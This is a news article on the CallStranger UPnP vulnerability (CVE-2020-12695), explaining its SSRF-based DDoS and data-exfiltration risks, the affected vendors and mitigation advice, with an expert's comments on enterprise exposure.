Billions of devices may be affected by a universal plug and play (UPnP) vulnerability that allows hackers to access other connected devices and conduct a DDoS attack on the local network. The bug affects devices that support the UPnP protocol, which enables devices to communicate with each other on local networks. The recently discovered bug known as CallStranger vulnerability is caused by a header value in the UPnP Subscribe function and can be controlled by an attacker to allow server-side request forgery (SSRF). The vulnerability could be used by hackers to execute a distributed denial of service attack as well as data exfiltration. The UPnP protocol is managed by the Open Connectivity Foundation (OCF), which has released an update, but most device manufacturers had not incorporated the changes in their firmware, leaving millions of devices vulnerable.
Risks of experiencing a DDoS attack or data exfiltration
The UPnP vulnerability, CVE-2020-12695, could be used to carry out a DDoS attack, bypass security systems, perform data exfiltration, and scan internal ports. Data exfiltration remains the biggest risk, according to Yunus Çadirci, the researcher who discovered the vulnerability in the universal plug and play protocol. Data exfiltration occurs when an unauthorized entity accesses a device on a network and copies data manually or using a software program. Once a malicious actor has access to the devices on the network, there is little the organization could do to prevent data exfiltration from taking place.
Çadirci says botnet operators could start using end-user devices in carrying out DDoS attacks. Although enterprises have blocked Internet exposed UPnP devices, an attacker could still perform a DDoS attack through intranet-to-intranet port scanning.
The reason the UPnP protocol is vulnerable to a DDoS attack is because of its automatic discovery capabilities. The protocol is intended to be used within the local area network where all devices are trusted. It, therefore, does not require any form of authentication of verification. While the Device Protection service adds an extra layer of security on the UPnP protocol, most UPnP device manufacturers have not adopted the technology.
Many internet-facing devices include the UPnP capabilities feature for easy connection. However, the discovery feature and internet connectivity allow hackers to send a large amount of data to arbitrary destinations accessible over the Internet.
Steps to protect vulnerable devices
To prevent devices within a local area network from being used to launch a DDoS attack or experience data exfiltration, UPnP vendors are advised to implement an update that was released on April 17, 2020, by the OCF. However, the update might take time to be adopted because it relies on vendors patching their firmware. Device users should not hesitate to update their devices once their vendors release an updated version of their device’s firmware.
Device manufacturers are advised to disable the UPnP SUBSCRIBE capability by default and require user consent and proper network restrictions to enable the feature. They should also disable the UPnP protocol on Internet-accessible interfaces.
Devices affected by the UPnP vulnerability include Windows PCs, gaming consoles, TVs, and routers from Asus, Belkin, Broadcom, Cisco, Dell, D-Link, Huawei, Netgear, Samsung, TP-Link, ZTE, and many more.
Home users are not directly affected by the CallStranger vulnerability unless their Internet-enabled devices have UPnP endpoints. They are therefore advised against port forwarding to UPnP endpoints.
Increased risks for the enterprise
With the Internet of things (IoT) becoming common in modern enterprise networks, the UPnP vulnerability increases the attack surface and makes it more likely for hackers to succeed in breaching networks. Hackers can now steal sensitive data through data exfiltration and shut down intranets by waging a DDoS attack on the host network. To prevent these forms of attacks, organizations could disable UPnP support for IoT devices with access to sensitive information. Isolating such devices from the enterprise network could also prevent such attacks from happening. However, updating the UPnP devices should be a priority for organizations.
Ilia Kolochenko, Founder & CEO of web security company ImmuniWeb says shadow IT and the complexity of IT infrastructure makes enterprise networks more vulnerable to attacks.
“Modern enterprises are characterized by a skyrocketing complexity of their IT infrastructure that may be dispersed across a hundred of countries and maintained by thousands of third parties. On one side, this makes organizations extremely vulnerable and susceptible to cyber-attacks such as ransomware, which exploit shadow IT devices, unprotected cloud and abandoned servers as an entry point into their victim’s premises. On the other side, however, this convoluted intricacy makes global attack virtually impossible, as some disjoint parts of the central system will continue working in isolation. It is nonetheless perfectly possible to identify the ‘heart and the brain’ of the system and target it directly with disastrous consequences.”
He adds that, “We will likely see professional cyber mercenaries being hired not just for data theft campaigns but for highly destructive and damage-creation hacking campaigns. Amid the political and economic crisis of the unprecedented scale, many unscrupulous organizations and state actors won’t hesitate to crush their rivals by paralyzing their computerized factories, supply management chains and sales points. Given how interconnected our IT infrastructure has become, thanks to the rapid proliferation of IoT devices and connected objects, one wisely prepared attack could swiftly shut down a global company for several weeks or even months. Visibility, inventory and continuous monitoring of your digital assets and data is the key to avoid falling victim to the sophisticated attacks.”